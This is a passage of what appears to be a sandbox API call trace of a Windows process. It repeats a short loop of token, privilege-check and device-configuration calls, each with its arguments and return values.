CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.036] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.036] GetCurrentThread () returned 0xfffffffe [0017.036] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.036] GetLastError () returned 0x3f0 [0017.036] GetCurrentProcess () returned 0xffffffff [0017.036] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.036] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.036] SetLastError (dwErrCode=0x522) [0017.036] CloseHandle (hObject=0x114) returned 1 [0017.036] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.036] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.036] GetLastError () returned 0x578 [0017.036] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.036] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.036] GetCurrentThread () returned 0xfffffffe [0017.036] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.036] GetLastError () returned 0x3f0 [0017.036] GetCurrentProcess () returned 0xffffffff [0017.036] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.036] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.036] SetLastError (dwErrCode=0x522) [0017.036] CloseHandle (hObject=0x114) returned 1 [0017.036] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.036] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.036] GetLastError () returned 0x578 [0017.036] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.036] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.036] GetCurrentThread () returned 0xfffffffe [0017.036] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.036] GetLastError () returned 0x3f0 [0017.036] GetCurrentProcess () returned 0xffffffff [0017.036] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.036] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.036] SetLastError (dwErrCode=0x522) [0017.036] CloseHandle (hObject=0x114) returned 1 [0017.036] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.036] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.036] GetLastError () returned 0x578 [0017.036] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.036] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.037] GetCurrentThread () returned 0xfffffffe [0017.037] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.037] GetLastError () returned 0x3f0 [0017.037] GetCurrentProcess () returned 0xffffffff [0017.037] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.037] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.037] SetLastError (dwErrCode=0x522) [0017.037] CloseHandle (hObject=0x114) returned 1 [0017.037] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.037] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.037] GetLastError () returned 0x578 [0017.037] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.037] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.037] GetCurrentThread () returned 0xfffffffe [0017.037] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.037] GetLastError () returned 0x3f0 [0017.037] GetCurrentProcess () returned 0xffffffff [0017.037] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.037] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.037] SetLastError (dwErrCode=0x522) [0017.037] CloseHandle (hObject=0x114) returned 1 [0017.037] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.037] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.037] GetLastError () returned 0x578 [0017.037] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.037] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.037] GetCurrentThread () returned 0xfffffffe [0017.037] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.037] GetLastError () returned 0x3f0 [0017.037] GetCurrentProcess () returned 0xffffffff [0017.037] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.037] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.037] SetLastError (dwErrCode=0x522) [0017.037] CloseHandle (hObject=0x114) returned 1 [0017.037] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.037] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.037] GetLastError () returned 0x578 [0017.037] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.037] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.037] GetCurrentThread () returned 0xfffffffe [0017.037] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.037] GetLastError () returned 0x3f0 [0017.037] GetCurrentProcess () returned 0xffffffff [0017.037] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.037] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.038] SetLastError (dwErrCode=0x522) [0017.038] CloseHandle (hObject=0x114) returned 1 [0017.038] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.038] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.038] GetLastError () returned 0x578 [0017.038] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.038] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.038] GetCurrentThread () returned 0xfffffffe [0017.038] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.038] GetLastError () returned 0x3f0 [0017.038] GetCurrentProcess () returned 0xffffffff [0017.038] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.038] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.038] SetLastError (dwErrCode=0x522) [0017.038] CloseHandle (hObject=0x114) returned 1 [0017.038] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.038] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.038] GetLastError () returned 0x578 [0017.038] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.038] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.038] GetCurrentThread () returned 0xfffffffe [0017.038] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.038] GetLastError () returned 0x3f0 [0017.038] GetCurrentProcess () returned 0xffffffff [0017.038] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.038] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.038] SetLastError (dwErrCode=0x522) [0017.038] CloseHandle (hObject=0x114) returned 1 [0017.038] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.038] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.038] GetLastError () returned 0x578 [0017.038] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.038] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.038] GetCurrentThread () returned 0xfffffffe [0017.038] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.038] GetLastError () returned 0x3f0 [0017.038] GetCurrentProcess () returned 0xffffffff [0017.038] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.038] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.038] SetLastError (dwErrCode=0x522) [0017.038] CloseHandle (hObject=0x114) returned 1 [0017.038] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.038] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.038] GetLastError () returned 0x578 [0017.039] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.039] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.039] GetCurrentThread () returned 0xfffffffe [0017.039] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.039] GetLastError () returned 0x3f0 [0017.039] GetCurrentProcess () returned 0xffffffff [0017.039] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.039] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.039] SetLastError (dwErrCode=0x522) [0017.039] CloseHandle (hObject=0x114) returned 1 [0017.039] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.039] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.039] GetLastError () returned 0x578 [0017.039] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.039] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.039] GetCurrentThread () returned 0xfffffffe [0017.039] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.039] GetLastError () returned 0x3f0 [0017.039] GetCurrentProcess () returned 0xffffffff [0017.039] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.039] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.039] SetLastError (dwErrCode=0x522) [0017.039] CloseHandle (hObject=0x114) returned 1 [0017.039] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.039] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.039] GetLastError () returned 0x578 [0017.039] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.039] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.039] GetCurrentThread () returned 0xfffffffe [0017.039] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.039] GetLastError () returned 0x3f0 [0017.039] GetCurrentProcess () returned 0xffffffff [0017.039] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.039] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.039] SetLastError (dwErrCode=0x522) [0017.039] CloseHandle (hObject=0x114) returned 1 [0017.039] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.039] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.039] GetLastError () returned 0x578 [0017.039] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.039] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.039] GetCurrentThread () returned 0xfffffffe [0017.039] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.039] GetLastError () returned 0x3f0 [0017.040] GetCurrentProcess () returned 0xffffffff [0017.040] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.040] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.040] SetLastError (dwErrCode=0x522) [0017.040] CloseHandle (hObject=0x114) returned 1 [0017.040] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.040] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.040] GetLastError () returned 0x578 [0017.040] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.040] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.040] GetCurrentThread () returned 0xfffffffe [0017.040] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.040] GetLastError () returned 0x3f0 [0017.040] GetCurrentProcess () returned 0xffffffff [0017.040] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.040] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.040] SetLastError (dwErrCode=0x522) [0017.040] CloseHandle (hObject=0x114) returned 1 [0017.040] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.040] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.040] GetLastError () returned 0x578 [0017.040] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.040] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.040] GetCurrentThread () returned 0xfffffffe [0017.040] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.040] GetLastError () returned 0x3f0 [0017.040] GetCurrentProcess () returned 0xffffffff [0017.040] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.040] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.040] SetLastError (dwErrCode=0x522) [0017.040] CloseHandle (hObject=0x114) returned 1 [0017.040] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.040] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.040] GetLastError () returned 0x578 [0017.040] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.040] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.040] GetCurrentThread () returned 0xfffffffe [0017.040] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.040] GetLastError () returned 0x3f0 [0017.040] GetCurrentProcess () returned 0xffffffff [0017.040] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.040] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.040] SetLastError (dwErrCode=0x522) [0017.040] CloseHandle (hObject=0x114) returned 1 [0017.041] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.041] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.041] GetLastError () returned 0x578 [0017.041] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.041] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.041] GetCurrentThread () returned 0xfffffffe [0017.041] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.041] GetLastError () returned 0x3f0 [0017.041] GetCurrentProcess () returned 0xffffffff [0017.041] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.041] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.041] SetLastError (dwErrCode=0x522) [0017.041] CloseHandle (hObject=0x114) returned 1 [0017.041] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.041] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.041] GetLastError () returned 0x578 [0017.041] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.041] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.041] GetCurrentThread () returned 0xfffffffe [0017.041] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.041] GetLastError () returned 0x3f0 [0017.041] GetCurrentProcess () returned 0xffffffff [0017.041] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.041] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.041] SetLastError (dwErrCode=0x522) [0017.041] CloseHandle (hObject=0x114) returned 1 [0017.041] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.041] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.041] GetLastError () returned 0x578 [0017.041] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.041] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.041] GetCurrentThread () returned 0xfffffffe [0017.041] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.041] GetLastError () returned 0x3f0 [0017.041] GetCurrentProcess () returned 0xffffffff [0017.041] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.041] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.041] SetLastError (dwErrCode=0x522) [0017.041] CloseHandle (hObject=0x114) returned 1 [0017.041] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.041] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.041] GetLastError () returned 0x578 [0017.041] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.041] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.042] GetCurrentThread () returned 0xfffffffe [0017.042] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.042] GetLastError () returned 0x3f0 [0017.042] GetCurrentProcess () returned 0xffffffff [0017.042] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.042] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.042] SetLastError (dwErrCode=0x522) [0017.042] CloseHandle (hObject=0x114) returned 1 [0017.042] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.042] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.042] GetLastError () returned 0x578 [0017.042] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.042] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.042] GetCurrentThread () returned 0xfffffffe [0017.042] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.042] GetLastError () returned 0x3f0 [0017.042] GetCurrentProcess () returned 0xffffffff [0017.042] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.042] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.042] SetLastError (dwErrCode=0x522) [0017.042] CloseHandle (hObject=0x114) returned 1 [0017.042] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.042] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 